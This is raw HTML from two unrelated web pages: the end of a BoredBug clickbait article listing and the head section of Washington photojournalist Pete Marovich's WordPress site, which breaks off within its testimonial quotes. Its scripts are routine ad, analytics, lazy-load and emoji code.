class="overlay-img"></span><img width="325" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/12/dual-citizenship-325x215.jpeg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" /><noscript><img width="325" height="215" src="https://boredbug.com/wp-content/uploads/2016/12/dual-citizenship-325x215.jpeg" class="attachment-home-post size-home-post wp-post-image" alt="" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/steps-to-renounce-your-u-s-citizenship/" rel="bookmark">Steps To Renounce Your U.S. Citizenship</a></h2></header></div></div></div></article><article id="post-86853" class="post-86853 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized"><div class="entry-featuredImg"><a href="https://boredbug.com/celebrities-battling-mental-disorders/"><span class="overlay-img"></span><img width="325" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/10/Angelina-Jolie-250-325x215.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" /><noscript><img width="325" height="215" src="https://boredbug.com/wp-content/uploads/2016/10/Angelina-Jolie-250-325x215.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/celebrities-battling-mental-disorders/" rel="bookmark">Celebrities Battling Mental Disorders</a></h2></header></div></div></div></article><article id="post-86756" class="post-86756 post type-post status-publish format-standard has-post-thumbnail hentry category-awesome-section category-crazy-section tag-buried-treasure tag-metal-detecting"><div class="entry-featuredImg"><a href="https://boredbug.com/you-wont-believe-what-he-found-while-treasure-hunting/"><span class="overlay-img"></span><img width="325" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/08/buried-treasure-chest-325x215.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" /><noscript><img width="325" height="215" src="https://boredbug.com/wp-content/uploads/2016/08/buried-treasure-chest-325x215.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/you-wont-believe-what-he-found-while-treasure-hunting/" rel="bookmark">You Won&#8217;t Believe What He Found While Treasure Hunting</a></h2></header></div></div></div></article><article id="post-86665" class="post-86665 post type-post status-publish format-standard has-post-thumbnail hentry category-crazy-section category-places category-travel"><div class="entry-featuredImg"><a href="https://boredbug.com/worlds-deepest-hole-discovered-in-china/"><span class="overlay-img"></span><img width="325" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/07/dragon-hole-china-325x215.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" srcset="" data-srcset="https://boredbug.com/wp-content/uploads/2016/07/dragon-hole-china-325x215.jpg 325w, https://boredbug.com/wp-content/uploads/2016/07/dragon-hole-china-200x133.jpg 200w, https://boredbug.com/wp-content/uploads/2016/07/dragon-hole-china-300x199.jpg 300w, https://boredbug.com/wp-content/uploads/2016/07/dragon-hole-china-768x510.jpg 768w, https://boredbug.com/wp-content/uploads/2016/07/dragon-hole-china.jpg 728w" sizes="(max-width: 325px) 100vw, 325px" /><noscript><img width="325" height="215" src="https://boredbug.com/wp-content/uploads/2016/07/dragon-hole-china-325x215.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" srcset="https://boredbug.com/wp-content/uploads/2016/07/dragon-hole-china-325x215.jpg 325w, https://boredbug.com/wp-content/uploads/2016/07/dragon-hole-china-200x133.jpg 200w, https://boredbug.com/wp-content/uploads/2016/07/dragon-hole-china-300x199.jpg 300w, https://boredbug.com/wp-content/uploads/2016/07/dragon-hole-china-768x510.jpg 768w, https://boredbug.com/wp-content/uploads/2016/07/dragon-hole-china.jpg 728w" sizes="(max-width: 325px) 100vw, 325px" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/worlds-deepest-hole-discovered-in-china/" rel="bookmark">World&#8217;s Deepest Hole Discovered In China</a></h2></header></div></div></div></article><article id="post-86668" class="post-86668 post type-post status-publish format-standard has-post-thumbnail hentry category-places category-travel"><div class="entry-featuredImg"><a href="https://boredbug.com/the-mystery-of-hemlock-lake/"><span class="overlay-img"></span><img width="325" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/07/hemlock-lake-325x215.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" /><noscript><img width="325" height="215" src="https://boredbug.com/wp-content/uploads/2016/07/hemlock-lake-325x215.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/the-mystery-of-hemlock-lake/" rel="bookmark">The Mystery Of Hemlock Lake</a></h2></header></div></div></div></article><article id="post-86795" class="post-86795 post type-post status-publish format-standard has-post-thumbnail hentry category-lifestyle tag-irish-baby-names"><div class="entry-featuredImg"><a href="https://boredbug.com/irish-baby-names-youll-instantly-love/"><span class="overlay-img"></span><img width="325" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/08/towel-head-325x215.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" /><noscript><img width="325" height="215" src="https://boredbug.com/wp-content/uploads/2016/08/towel-head-325x215.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/irish-baby-names-youll-instantly-love/" rel="bookmark">Irish Baby Names You&#8217;ll Instantly Love</a></h2></header></div></div></div></article><article id="post-86717" class="post-86717 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized"><div class="entry-featuredImg"><a href="https://boredbug.com/camelot-continued-the-new-generation-of-kennedys/"><span class="overlay-img"></span><img width="325" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/08/tumblr_nhhf2kGP041sx5pm6o1_1280-325x215.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" /><noscript><img width="325" height="215" src="https://boredbug.com/wp-content/uploads/2016/08/tumblr_nhhf2kGP041sx5pm6o1_1280-325x215.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/camelot-continued-the-new-generation-of-kennedys/" rel="bookmark">Camelot Continued: The New Generation of Kennedys</a></h2></header></div></div></div></article><article id="post-86670" class="post-86670 post type-post status-publish format-standard has-post-thumbnail hentry category-entertainment-2 category-scary-section"><div class="entry-featuredImg"><a href="https://boredbug.com/see-what-happens-when-spiders-takeover-a-town/"><span class="overlay-img"></span><img width="325" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/08/featured-325x215.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" /><noscript><img width="325" height="215" src="https://boredbug.com/wp-content/uploads/2016/08/featured-325x215.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/see-what-happens-when-spiders-takeover-a-town/" rel="bookmark">See What Happens When Spiders Takeover A Town</a></h2></header></div></div></div></article><article id="post-86682" class="post-86682 post type-post status-publish format-standard has-post-thumbnail hentry category-awesome-section category-business category-money category-movies-celebrities"><div class="entry-featuredImg"><a href="https://boredbug.com/those-old-vhs-tapes-could-be-worth-gold/"><span class="overlay-img"></span><img width="325" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/07/gold-vhs-tape-325x215.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" /><noscript><img width="325" height="215" src="https://boredbug.com/wp-content/uploads/2016/07/gold-vhs-tape-325x215.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/those-old-vhs-tapes-could-be-worth-gold/" rel="bookmark">Those Old VHS Tapes Could Be Worth Gold</a></h2></header></div></div></div></article><article id="post-86723" class="post-86723 post type-post status-publish format-standard has-post-thumbnail hentry category-celebrities category-entertainment-2"><div class="entry-featuredImg"><a href="https://boredbug.com/the-most-adorable-photos-of-princess-charlotte/"><span class="overlay-img"></span><img width="300" height="168" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/08/images-5.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" srcset="" data-srcset="https://boredbug.com/wp-content/uploads/2016/08/images-5.jpg 300w, https://boredbug.com/wp-content/uploads/2016/08/images-5-200x112.jpg 200w" sizes="(max-width: 300px) 100vw, 300px" /><noscript><img width="300" height="168" src="https://boredbug.com/wp-content/uploads/2016/08/images-5.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" srcset="https://boredbug.com/wp-content/uploads/2016/08/images-5.jpg 300w, https://boredbug.com/wp-content/uploads/2016/08/images-5-200x112.jpg 200w" sizes="(max-width: 300px) 100vw, 300px" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/the-most-adorable-photos-of-princess-charlotte/" rel="bookmark">The Most Adorable Photos Of Princess Charlotte</a></h2></header></div></div></div></article><article id="post-86718" class="post-86718 post type-post status-publish format-standard has-post-thumbnail hentry category-crazy-section category-lifestyle"><div class="entry-featuredImg"><a href="https://boredbug.com/skydiver-jumps-from-25000-feet-without-a-parachute-and-survives/"><span class="overlay-img"></span><img width="325" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/07/skydiver-no-parachute-325x215.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" /><noscript><img width="325" height="215" src="https://boredbug.com/wp-content/uploads/2016/07/skydiver-no-parachute-325x215.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/skydiver-jumps-from-25000-feet-without-a-parachute-and-survives/" rel="bookmark">Skydiver Jumps From 25,000 Feet Without A Parachute And Survives</a></h2></header></div></div></div></article><article id="post-86685" class="post-86685 post type-post status-publish format-standard has-post-thumbnail hentry category-places category-travel tag-winter-travel"><div class="entry-featuredImg"><a href="https://boredbug.com/top-25-winter-travel-destinations/"><span class="overlay-img"></span><img width="325" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/07/featured-image-325x215.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" /><noscript><img width="325" height="215" src="https://boredbug.com/wp-content/uploads/2016/07/featured-image-325x215.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/top-25-winter-travel-destinations/" rel="bookmark">Top 25 Winter Travel Destinations</a></h2></header></div></div></div></article><article id="post-86627" class="post-86627 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized"><div class="entry-featuredImg"><a href="https://boredbug.com/beautiful-french-baby-names-that-you-never-considered/"><span class="overlay-img"></span><img width="325" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/07/baby-girl-3-325x215.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" /><noscript><img width="325" height="215" src="https://boredbug.com/wp-content/uploads/2016/07/baby-girl-3-325x215.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/beautiful-french-baby-names-that-you-never-considered/" rel="bookmark">Beautiful French Baby Names That You Never Considered</a></h2></header></div></div></div></article><article id="post-86594" class="post-86594 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized"><div class="entry-featuredImg"><a href="https://boredbug.com/25-celebrities-who-support-donald-trump-for-president/"><span class="overlay-img"></span><img width="325" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/07/celebrity-donald-trump-supporters-092115-u1-1-325x215.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" /><noscript><img width="325" height="215" src="https://boredbug.com/wp-content/uploads/2016/07/celebrity-donald-trump-supporters-092115-u1-1-325x215.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/25-celebrities-who-support-donald-trump-for-president/" rel="bookmark">25 Celebrities Who Support Donald Trump For President</a></h2></header></div></div></div></article></main><nav class="navigation paging-navigation" role="navigation"><h2 class="screen-reader-text">Posts navigation</h2><div class="nav-links"><div class="nav-previous"><a href="https://boredbug.com/page/2/"><span class="meta-nav"><i class="fa spaceRight fa-angle-double-left"></i></span>Older Posts</a></div></div></nav></div><div id="secondary" class="widget-area" role="complementary"><div id="widget_code_php_in_widget-2" class="widget code_php_in_widget" data-version="1.4"><h3 class="widget-title widget_title"> <span></span></h3><div><div class="execphpwidget"><div><div class="add-info">ADVERTISEMENT</div> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-2763588259572159" data-ad-slot="4003548792" data-ad-format="auto" data-full-width-responsive="true"></ins> <script>(adsbygoogle = window.adsbygoogle || []).push({});</script></div><div> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block" data-ad-format="autorelaxed" data-ad-client="ca-pub-2763588259572159" data-ad-slot="8046735587"></ins> <script>(adsbygoogle = window.adsbygoogle || []).push({});</script></div></div></div></div></div></div><footer id="colophon" class="site-footer" role="contentinfo"><div class="site-info"><p class="footer-copy">Copyright &copy; 2019 <a href="https://boredbug.com/">BoredBug</a></p><nav class="footer-navigation"><ul id="menu-nbb-secondary" class="nav footer-nav cf"><li id="menu-item-16887" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16887"><a href="https://boredbug.com/category/section/awesome-section/">Awesome</a></li><li id="menu-item-28661" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28661"><a href="https://boredbug.com/category/section/crazy-section/">Crazy</a></li><li id="menu-item-16888" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16888"><a href="https://boredbug.com/category/section/cute/">Cute</a></li><li id="menu-item-16889" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16889"><a href="https://boredbug.com/category/section/fails/">Fails</a></li><li id="menu-item-16890" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16890"><a href="https://boredbug.com/category/section/funny-section/">Funny</a></li><li id="menu-item-16891" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16891"><a href="https://boredbug.com/category/section/scary-section/">Scary</a></li><li id="menu-item-16892" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16892"><a href="https://boredbug.com/category/section/video/">Video</a></li><li id="menu-item-16893" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16893"><a href="https://boredbug.com/category/section/weird-section/">Weird</a></li></ul></nav></div></footer></div> <script type='text/javascript'>var a3_lazyload_params = {"apply_images":"1","apply_videos":"1"};</script> <script type='text/javascript'>var a3_lazyload_extend_params = {"edgeY":"0"};</script> <script type="text/javascript" defer src="https://boredbug.com/wp-content/cache/autoptimize/js/autoptimize_18fb20a220b8c218f74311733612db84.js"></script><script data-cfasync='false'>!function(t){"use strict";t.loadCSS||(t.loadCSS=function(){});var e=loadCSS.relpreload={};if(e.support=function(){var e;try{e=t.document.createElement("link").relList.supports("preload")}catch(t){e=!1}return function(){return e}}(),e.bindMediaToggle=function(t){function e(){t.media=a}var a=t.media||"all";t.addEventListener?t.addEventListener("load",e):t.attachEvent&&t.attachEvent("onload",e),setTimeout(function(){t.rel="stylesheet",t.media="only x"}),setTimeout(e,3e3)},e.poly=function(){if(!e.support())for(var a=t.document.getElementsByTagName("link"),n=0;n<a.length;n++){var o=a[n];"preload"!==o.rel||"style"!==o.getAttribute("as")||o.getAttribute("data-loadcss")||(o.setAttribute("data-loadcss",!0),e.bindMediaToggle(o))}},!e.support()){e.poly();var a=t.setInterval(e.poly,500);t.addEventListener?t.addEventListener("load",function(){e.poly(),t.clearInterval(a)}):t.attachEvent&&t.attachEvent("onload",function(){e.poly(),t.clearInterval(a)})}"undefined"!=typeof exports?exports.loadCSS=loadCSS:t.loadCSS=loadCSS}("undefined"!=typeof global?global:this);</script></body></html>
0
<!DOCTYPE html> <!--[if IE 7]> <html id="ie7" lang="en-US"> <![endif]--> <!--[if IE 8]> <html id="ie8" lang="en-US"> <![endif]--> <!--[if !(IE 6) | !(IE 7) | !(IE 8) ]><!--> <html lang="en-US"> <!--<![endif]--> <head> <meta charset="UTF-8" /> <meta name="viewport" content="initial-scale=1.0, width=device-width" /> <title>Pete Marovich - Washington DC Photojournalist and Political Photographer</title> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="http://www.petemarovichimages.com/xmlrpc.php" /> <!--[if lt IE 9]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <!-- All in One SEO Pack 2.8 by Michael Torbert of Semper Fi Web Designob_start_detected [-1,-1] --> <meta name="description" content="Pete Marovich is a documentary and political photojournalist based in Washington, D.C. specializing in politics, corporate editorial, public relations and human" /> <meta name="keywords" content="D.C. Photographer, D.C. Photographers, Washington D.C. Photographer, Washington D.C. Photographers, D.C.,DC Photographer, DC Photographers, Washington DC Photographer, Washington DC Photographers, DC, photographer, public relations photographer ,public relations photographers, event photographer, commercial photographer, commercial photographers, annual report photographer, annual report photographers, editorial photographer, photojournalist, advertising, corporate ,travel, location, white house, WHNPA, environmental, concert, performance, wire, service, freelance, freelancer, Capitol Hill ,Fine art prints, Reportage, sports, archival, fuji crystal archive, silver gelatin, collectable, photojournalism. white house photographer, Capitol Hill photographer, political photographer, politics, congress photographer, congressional photographer, congressional hearing photographer, congressional hearing, Senate photographer, Senate" /> <meta name="google-site-verification" content="3gB8D36HpaQHHJpxRCCxNXayirORnXB-7MyHuSEkyVM" /> <link rel='next' href='http://www.petemarovichimages.com/page/2/' /> <link rel="canonical" href="http://www.petemarovichimages.com/" /> <script type="text/javascript" > window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date; ga('create', 'UA-45581735-1', 'auto'); // Plugins ga('send', 'pageview'); </script> <script async src="https://www.google-analytics.com/analytics.js"></script> <!-- /all in one seo pack --> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Pete Marovich - Photojournalist and Political Photographer in Washington, DC &raquo; Feed" href="http://www.petemarovichimages.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Pete Marovich - Photojournalist and Political Photographer in Washington, DC &raquo; Comments Feed" href="http://www.petemarovichimages.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/s4694.pcdn.co\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='WP_World_Travel-css' href='http://s4694.pcdn.co/wp-content/plugins/wp-world-travel/css/wp-world-travel.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='ch_css_base-css' href='http://s4694.pcdn.co/wp-content/plugins/contesthopper/css/ch_base.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='http://s4694.pcdn.co/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='responsive-lightbox-fancybox-css' href='http://s4694.pcdn.co/wp-content/plugins/responsive-lightbox/assets/fancybox/jquery.fancybox.min.css?ver=2.0.5' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-layout-css' href='//s4694.pcdn.co/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=2.6.14' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-smallscreen-css' href='//s4694.pcdn.co/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=2.6.14' type='text/css' media='only screen and (max-width: 768px)' /> <link rel='stylesheet' id='woocommerce-general-css' href='//s4694.pcdn.co/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=2.6.14' type='text/css' media='all' /> <link rel='stylesheet' id='wpt-twitter-feed-css' href='http://s4694.pcdn.co/wp-content/plugins/wp-to-twitter/css/twitter-feed.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='style-css' href='http://s4694.pcdn.co/wp-content/themes/gridspace/style.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='alt-style-css' href='http://s4694.pcdn.co/wp-content/themes/gridspace/css/default.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='flexslider-css' href='http://s4694.pcdn.co/wp-content/themes/gridspace/js/flexslider/flexslider.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='gpp-custom-fonts-css' href='http://fonts.googleapis.com/css?family=Raleway%3A400%2C200%2C300%2C100%7CMolengo&#038;ver=5.1.1' type='text/css' media='all' /> <script type='text/javascript' src='http://s4694.pcdn.co/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://s4694.pcdn.co/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://s4694.pcdn.co/wp-content/plugins/wp-world-travel/js/wp-world-travel.js?ver=5.1.1'></script> <script type='text/javascript' src='http://s4694.pcdn.co/wp-content/plugins/responsive-lightbox/assets/fancybox/jquery.fancybox.min.js?ver=2.0.5'></script> <script type='text/javascript' src='http://s4694.pcdn.co/wp-content/plugins/responsive-lightbox/assets/infinitescroll/infinite-scroll.pkgd.min.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var rlArgs = {"script":"fancybox","selector":"lightbox","customEvents":"","activeGalleries":"1","modal":"0","showOverlay":"1","showCloseButton":"1","enableEscapeButton":"1","hideOnOverlayClick":"1","hideOnContentClick":"1","cyclic":"0","showNavArrows":"1","autoScale":"0","scrolling":"yes","centerOnScroll":"1","opacity":"1","overlayOpacity":"70","overlayColor":"#666","titleShow":"0","titlePosition":"outside","transitions":"fade","easings":"swing","speeds":"300","changeSpeed":"300","changeFade":"100","padding":"5","margin":"5","videoWidth":"1080","videoHeight":"720","woocommerce_gallery":"0","ajaxurl":"http:\/\/www.petemarovichimages.com\/wp-admin\/admin-ajax.php","nonce":"5a963af584"}; /* ]]> */ </script> <script type='text/javascript' src='http://s4694.pcdn.co/wp-content/plugins/responsive-lightbox/js/front.js?ver=2.0.5'></script> <script type='text/javascript' src='http://s4694.pcdn.co/wp-content/plugins/wp-retina-2x/js/picturefill.min.js?ver=3.0.2'></script> <script type='text/javascript' src='http://s4694.pcdn.co/wp-content/themes/gridspace/js/selectivizr.min.js?ver=1.0.2'></script> <script type='text/javascript' src='http://s4694.pcdn.co/wp-content/themes/gridspace/js/jquery.fitvids.js?ver=1.0'></script> <script type='text/javascript' src='http://s4694.pcdn.co/wp-content/themes/gridspace/js/flexslider/jquery.flexslider-min.js?ver=5.1.1'></script> <script type='text/javascript' src='http://s4694.pcdn.co/wp-content/themes/gridspace/js/jquery.cookie.js?ver=1.0.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var gridspace = {"ajaxurl":"http:\/\/www.petemarovichimages.com\/wp-admin\/admin-ajax.php","ajaxnonce":"f4ce076879"}; /* ]]> */ </script> <script type='text/javascript' src='http://s4694.pcdn.co/wp-content/themes/gridspace/js/scripts.js?ver=1.0'></script> <link rel='https://api.w.org/' href='http://www.petemarovichimages.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.petemarovichimages.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://s4694.pcdn.co/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <meta name="generator" content="WooCommerce 2.6.14" /> <!--/ Facebook Thumb Fixer Open Graph /--> <meta property="og:type" content="article" /> <meta property="og:url" content="http://www.petemarovichimages.com" /> <meta property="og:title" content="Pete Marovich - Photojournalist and Political Photographer in Washington, DC" /> <meta property="og:description" content="Dispatches from the Field" /> <meta property="og:site_name" content="Pete Marovich - Photojournalist and Political Photographer in Washington, DC" /> <meta property="og:image" content="" /> <meta itemscope itemtype="article" /> <meta itemprop="description" content="Dispatches from the Field" /> <meta itemprop="image" content="" /> <script type='text/javascript'> quoteRotator = { i: 1, quotes: ["<span id='openquote' class='quotemark'>“</span><span id='quote'>Pete Marovich\'s images are successful on many levels. First, they are visually compelling. Pete has the eye of a cinematographer and can take an ordinary situation and make something extraordinary out of it. Secondly, Pete connects with his subjects and through his photography allows others to be transported into their world. Thirdly, Pete respects the people he photographs. I highly recommend Pete Marovich for any photo-related endeavor.</span><span id='closequote' class='quotemark'>”</span> <span id='quoteauthor'> </br></br>– Scott Strazzante, Photojournalist, Chicago Tribune</span>", "<span id='openquote' class='quotemark'>“</span><span id='quote'>Pete Marovich has always gone above and beyond and made each assignment his own. I\'ve genuinely enjoyed and appreciated his efforts and his photos every time he has shot for us. It\'s rare to find his level of passion, dedication and raw talent; he\'s beyond a true professional.</span><span id='closequote' class='quotemark'>”</span> <span id='quoteauthor'> </br></br>– Assistant Photo Editor </br>The Chronicle of Higher Education</span>", "<span id='openquote' class='quotemark'>“</span><span id='quote'>I very much enjoy working with Pete. He is knowledgeable, professional and always a gentleman.</span><span id='closequote' class='quotemark'>”</span> <span id='quoteauthor'> 